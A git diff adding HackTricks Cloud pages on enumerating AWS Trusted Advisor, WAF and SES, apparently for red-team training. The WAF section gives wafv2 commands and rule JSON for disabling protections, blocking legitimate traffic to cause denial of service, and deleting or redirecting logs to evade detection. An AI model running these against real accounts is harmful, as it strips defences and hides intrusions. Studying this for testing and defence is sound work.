+{% endhint %} + +## AWS Trusted Advisor Overview + +Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: + +1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. +2. **Performance:** Identifies potential performance bottlenecks. +3. **Security:** Scans for vulnerabilities or weak security configurations. +4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. + +The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. + +### Notifications and Data Refresh + +* Trusted Advisor can issue alerts. +* Items can be excluded from its checks. +* Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. + +### **Checks Breakdown** + +#### CategoriesCore + +1. Cost Optimization +2. Security +3. Fault Tolerance +4. Performance +5. Service Limits +6. S3 Bucket Permissions + +#### Core Checks + +Limited to users without business or enterprise support plans: + +1. Security Groups - Specific Ports Unrestricted +2. IAM Use +3. MFA on Root Account +4. EBS Public Snapshots +5. RDS Public Snapshots +6. 
Service Limits + +#### Security Checks + +A list of checks primarily focusing on identifying and rectifying security threats: + +* Security group settings for high-risk ports +* Security group unrestricted access +* Open write/list access to S3 buckets +* MFA enabled on root account +* RDS security group permissiveness +* CloudTrail usage +* SPF records for Route 53 MX records +* HTTPS configuration on ELBs +* Security groups for ELBs +* Certificate checks for CloudFront +* IAM access key rotation (90 days) +* Exposure of access keys (e.g., on GitHub) +* Public visibility of EBS or RDS snapshots +* Weak or absent IAM password policies + +AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. + +## **References** + +* [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md new file mode 100644 index 0000000000..67086a9939 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -0,0 +1,501 @@ +# AWS - WAF Enum + +## AWS - WAF Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS WAF + +AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. + +### Key concepts + +#### Web ACL (Access Control List) + +A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions. + +#### Rule Group + +A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs. + +Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it. + +#### Rule + +A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules: + +1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests. +2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**. + +#### Managed Rules + +AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. 
These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities. + +#### IP Set + +An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules. + +#### Regex Pattern Set + +A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters. + +#### Lock Token + +A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. + +#### API Keys + +API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations. + +* **Example**: Integration of the CAPTCHA API. + +#### Permission Policy + +A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations. + +#### Scope + +The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution. + +* **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. +* **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. 
WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. + +### Key features + +#### Monitoring Criteria (Conditions) + +**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**. + +Each AWS account can configure: + +* **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). +* **100 rules** and **50 Web ACLs**. +* A maximum of **5 rate-based rules**. +* A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. + +#### Rule actions + +Actions are assigned to each rule, with options being: + +* **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. +* **Block**: The request is terminated immediately. +* **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. +* **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. + +If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: + +1. Allow Whitelisted IPs. +2. Block Blacklisted IPs. +3. Block requests matching any detrimental signatures. + +#### CloudWatch Integration + +AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. 
These metrics are reported every minute by default and retained for a period of two weeks. + +### Enumeration + +In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia): + +* CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . +* API and SDKs - For all calls, use the Region endpoint us-east-1. + +In order to interact with regional services, you should specify the region: + +* Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` + +```bash +# Web ACLs # + +## Retrieve a list of web access control lists (Web ACLs) available in your AWS account +aws wafv2 list-web-acls --scope | CLOUDFRONT --region=us-east-1> +## Retrieve details about the specified Web ACL +aws wafv2 get-web-acl --name --id --scope | CLOUDFRONT --region=us-east-1> + +## Retrieve a list of resources associated with a specific web access control list (Web ACL) +aws wafv2 list-resources-for-web-acl --web-acl-arn # Additional permissions needed depending on the protected resource type: cognito-idp:ListResourcesForWebACL, ec2:DescribeVerifiedAccessInstanceWebAclAssociations or apprunner:ListAssociatedServicesForWebAcl +## Retrieve the Web ACL associated with the specified AWS resource +aws wafv2 get-web-acl-for-resource --resource-arn # Additional permissions needed depending on the protected resource type: cognito-idp:GetWebACLForResource, ec2:GetVerifiedAccessInstanceWebAcl, wafv2:GetWebACL or apprunner:DescribeWebAclForService + +# Rule groups # + +## List of the rule groups available in your AWS account +aws wafv2 list-rule-groups --scope | CLOUDFRONT --region=us-east-1> +## Retrieve the details of a specific rule group +aws wafv2 get-rule-group [--name ] [--id ] [--arn ] [--scope | CLOUDFRONT --region=us-east-1>] +## Retrieve the IAM policy attached to the specified rule group +aws wafv2 get-permission-policy --resource-arn # Just the owner of the Rule Group can do this 
operation + +# Managed rule groups (by AWS or by a third-party) # + +## List the managed rule groups that are available +aws wafv2 list-available-managed-rule-groups --scope | CLOUDFRONT --region=us-east-1> +## List the available versions of the specified managed rule group +aws wafv2 list-available-managed-rule-group-versions --vendor-name --name --scope | CLOUDFRONT --region=us-east-1> +## Retrieve high-level information about a specific managed rule group +aws wafv2 describe-managed-rule-group --vendor-name --name --scope | CLOUDFRONT --region=us-east-1> [--version-name ] +## Retrieve high-level information about all managed rule groups +aws wafv2 describe-all-managed-products --scope | CLOUDFRONT --region=us-east-1> +## Retrieve high-level information about all managed rule groups from a specific vendor +aws wafv2 describe-managed-products-by-vendor --vendor-name --scope | CLOUDFRONT --region=us-east-1> + +# IP sets # + +## List the IP sets that are available in your AWS account +aws wafv2 list-ip-sets --scope | CLOUDFRONT --region=us-east-1> +## Retrieve the specific IP set +aws wafv2 get-ip-set --name --id --scope | CLOUDFRONT --region=us-east-1> +## Retrieve the keys that are currently being managed by a rate-based rule. 
+aws wafv2 get-rate-based-statement-managed-keys --scope | CLOUDFRONT --region=us-east-1>\ + --web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] + +# Regex pattern sets # + +## List all the regex pattern sets that you manage +aws wafv2 list-regex-pattern-sets --scope | CLOUDFRONT --region=us-east-1> +## Retrieves the specified regex pattern sets +aws wafv2 get-regex-pattern-set --name --id --scope | CLOUDFRONT --region=us-east-1> + +# API Keys # + +## List API keys for the specified scope +aws wafv2 list-api-keys --scope | CLOUDFRONT --region=us-east-1> +## Retrieve decrypted API key +aws wafv2 get-decrypted-api-key --scope | CLOUDFRONT --region=us-east-1> --api-key + +# Logs # + +## List of logging configurations (storage location of the logs) +aws wafv2 list-logging-configurations --scope | CLOUDFRONT --region=us-east-1> [--log-scope ] +## Retrieve the logging configuration settings associated with a specific web ACL +aws wafv2 get-logging-configuration --resource-arn [--log-scope ] [--log-type ] + +# Miscelaneous # + +## Retrieve a list of the tags associated to the specified resource +aws wafv2 list-tags-for-resource resource-arn + +## Retrieve a sample of web requests that match a specified rule within a WebACL during a specified time range +aws wafv2 get-sampled-requests --web-acl-arn --rule-metric-name --time-window --max-items <1-500> --scope + +## Obtains the web ACL capacity unit (WCU) requirements for a specified scope and ruleset +aws wafv2 check-capacity --scope | CLOUDFRONT --region=us-east-1> --rules + +## List of available releases for the AWS WAFv2 mobile SDK +aws wafv2 list-mobile-sdk-releases --platform +## Retrieves information for the specified mobile SDK release +aws wafv2 get-mobile-sdk-release --platform --release-version + +``` + +### Post Exploitation / Bypass + +{% hint style="success" %} +From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him 
to compromise other webs. + +However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. +{% endhint %} + +In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource. + +#### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`** + +An attacker would be able to compromise the security of the affected resource by: + +* Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. +* Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. +* Deleting rule groups that provide critical security measures. 
+ +```bash +# Create Rule Group +aws wafv2 create-rule-group --name --capacity --visibility-config \ +--scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] +# Update Rule Group +aws wafv2 update-rule-group --name --id --visibility-config --lock-token \ + --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] +# Delete Rule Group +aws wafv2 delete-rule-group --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> +``` + +The following examples shows a rule group that would block legitimate traffic from specific IP addresses: + +```bash +aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json +``` + +The **rule.json** file would look like: + +```json +[ + { + "Name":"BlockLegitimateIPsRule", + "Priority":0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action":{ + "Block":{} + }, + "VisibilityConfig":{ + "SampledRequestsEnabled":false, + "CloudWatchMetricsEnabled":false, + "MetricName":"BlockLegitimateIPsRule" + } + } +] +``` + +**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. + +#### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`** + +With these permissions, an attacker would be able to: + +* Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. +* Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. 
+* Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. + +{% hint style="info" %} +You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. +{% endhint %} + +```bash +# Create Web ACL +aws wafv2 create-web-acl --name --default-action --visibility-config \ +--scope | CLOUDFRONT --region=us-east-1> [--rules ] [--captcha-config ] [--description ] +# Update Web ACL +aws wafv2 update-web-acl --name --id --default-action --visibility-config --lock-token \ +--scope | CLOUDFRONT --region=us-east-1> [--rules ] [--captcha-config ] [--description ] +# Delete Web ACL +aws wafv2 delete-web-acl --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> +``` + +The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS. + +**Original Web ACL**: + +```json +{ + "WebACL": { + "Name": "AllowLegitimateIPsWebACL", + "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "DefaultAction": { + "Allow": {} + }, + "Description": "", + "Rules": [ + { + "Name": "AllowLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Allow": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "AllowLegitimateIPsRule" + } + } + ], + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "AllowLegitimateIPsWebACL" + }, + "Capacity": 1, + "ManagedByFirewallManager": false, + "LabelNamespace": 
"awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" + }, + "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} + +``` + +Command to update the Web ACL: + +```json +aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1 +``` + +The **rule.json** file would look like: + +```json +[ + { + "Name": "BlockLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Block": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "BlockLegitimateIPRule" + } + } +] +``` + +**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. + +#### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`** + +The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection. 
+ +The additional permissions would be needed depending on the protected resource type: + +* **Associate** + * apigateway:SetWebACL + * apprunner:AssociateWebAcl + * appsync:SetWebACL + * cognito-idp:AssociateWebACL + * ec2:AssociateVerifiedAccessInstanceWebAcl + * elasticloadbalancing:SetWebAcl +* **Disassociate** + * apigateway:SetWebACL + * apprunner:DisassociateWebAcl + * appsync:SetWebACL + * cognito-idp:DisassociateWebACL + * ec2:DisassociateVerifiedAccessInstanceWebAcl + * elasticloadbalancing:SetWebAcl + +```bash +# Associate +aws wafv2 associate-web-acl --web-acl-arn --resource-arn +# Disassociate +aws wafv2 disassociate-web-acl --resource-arn +``` + +**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF. + +#### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`** + +An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources. 
+ +```bash +# Create IP set +aws wafv2 create-ip-set --name --ip-address-version --addresses --scope | CLOUDFRONT --region=us-east-1> +# Update IP set +aws wafv2 update-ip-set --name --id --addresses --lock-token --scope | CLOUDFRONT --region=us-east-1> +# Delete IP set +aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> +``` + +The following example shows how to **overwrite the existing IP set by the desired IP set**: + +```bash +aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 +``` + +**Potential Impact**: Unauthorized access and block of legitimate traffic. + +#### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`** + +An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns. + +* Creating new regex patterns would help an attacker to allow harmful content +* Updating the existing patterns, an attacker would to bypass security rules +* Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. 
+ +```bash +# Create regex pattern set +aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] +# Update regex pattern set +aws wafv2 update-regex-pattern-set --name --id --regular-expression-list --lock-token --scope | CLOUDFRONT --region=us-east-1> +# Delete regex pattern set +aws wafv2 delete-regex-pattern-set --name --scope | CLOUDFRONT --region=us-east-1> --id --lock-token +``` + +**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF. + +#### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`** + +An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control. + +During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination: + +* **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. +* **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. +* **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. 
This role allows AWS WAF to deliver logs to the configured Firehose stream. + +{% hint style="info" %} +It is possible to define only one logging destination per web ACL. +{% endhint %} + +```bash +# Put logging configuration +aws wafv2 put-logging-configuration --logging-configuration +# Delete logging configuration +aws wafv2 delete-logging-configuration --resource-arn [--log-scope ] [--log-type ] +``` + +**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments. + +#### **`wafv2:DeleteAPIKey`** + +An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource. + +```bash +# Delete API key +aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> +``` + +**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft. + +#### **`wafv2:TagResource`, `wafv2:UntagResource`** + +An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations. + +```bash +# Tag +aws wafv2 tag-resource --resource-arn --tags +# Untag +aws wafv2 untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption. 
+ +## References + +* [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) +* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md new file mode 100644 index 0000000000..bc219d0c6a --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md @@ -0,0 +1,156 @@ +# AWS - SES Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes. + +You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails). + +### SMTP User + +It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "ses:SendRawEmail", + "Resource": "*" + } + ] +} +``` + +Then, gather the **API key and secret** of the user and run: + +```bash +git clone https://github.com/lisenet/ses-smtp-converter.git +cd ./ses-smtp-converter +chmod u+x ./ses-smtp-conv.sh +./ses-smtp-conv.sh +``` + +It's also possible to do this from the AWS console web. + +### Enumeration + +{% hint style="warning" %} +Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. 
+{% endhint %} + +{% code overflow="wrap" %} +```bash +# Get info about the SES account +aws sesv2 get-account +aws ses get-account-sending-enabled # Check if enabled + +# Get registered domains and email addresses (identities) +aws ses list-identities +aws sesv2 list-email-identities +aws sesv2 get-email-identity --email-identity #Get at once all the attributes + +# Get Resource Policies applied in the identity +aws ses list-identity-policies --identity +aws ses get-identity-policies --identity --policy-names +aws sesv2 get-email-identity-policies --email-identity + +# Get attributes of the identity +## Check if verified +aws ses get-identity-verification-attributes --identities +## DKIM settings, relevant for identities that are domains not emails +aws ses get-identity-dkim-attributes --identities +## Get what happnes if the send mail from the identity fails +aws ses get-identity-mail-from-domain-attributes --identities +## otifications attributes +aws ses get-identity-notification-attributes --identities + +# Get email templates +aws ses list-templates +aws ses get-template --template-name +aws sesv2 list-email-templates +aws sesv2 get-email-template --template-name + +# Get custom verification email templates +## This is the email sent when an identity is verified, it can be customized +aws ses list-custom-verification-email-templates +aws sesv2 list-custom-verification-email-templates +aws ses get-custom-verification-email-template --template-name +aws sesv2 get-custom-verification-email-template --template-name + +# Get receipt rule sets +## Receipt rules indicate how to handle incoming mail by executing an ordered list of actions +aws ses list-receipt-rule-sets +aws ses describe-receipt-rule-set --rule-set-name +aws ses describe-receipt-rule-set --rule-set-name --rule-name +## Metadata and receipt rules for the receipt rule set that is currently active +aws ses describe-active-receipt-rule-set + +# Get suppressed destinations +aws sesv2 
list-suppressed-destinations +aws sesv2 get-suppressed-destination --email-address + +# Get configuration sets +## These are set of rules applied to the identities related to the configuration set +aws ses list-configuration-sets +aws sesv2 list-configuration-sets +aws ses describe-configuration-set --configuration-set-name --configuration-set-attribute-names eventDestinations trackingOptions deliveryOptions reputationOptions +aws sesv2 get-configuration-set --configuration-set-name +aws sesv2 get-configuration-set-event-destinations --configuration-set-name + +# Get Contacts list +aws sesv2 list-contact-lists +aws sesv2 list-contacts --contact-list-name +aws sesv2 get-contact-list --contact-list-name +aws sesv2 get-contact --contact-list-name --email-address + +# Private IPs +aws sesv2 list-dedicated-ip-pools +aws sesv2 get-dedicated-ip-pool --pool-name +aws sesv2 get-dedicated-ips --pool-name #Only valid if ScalingMode is Standard +aws sesv2 get-dedicated-ip --ip + +# Misc +## Get send quota +aws ses get-send-quota +## Get statistics +aws ses get-send-statistics +``` +{% endcode %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-ses-post-exploitation.md" %} +[aws-ses-post-exploitation.md](../aws-post-exploitation/aws-ses-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
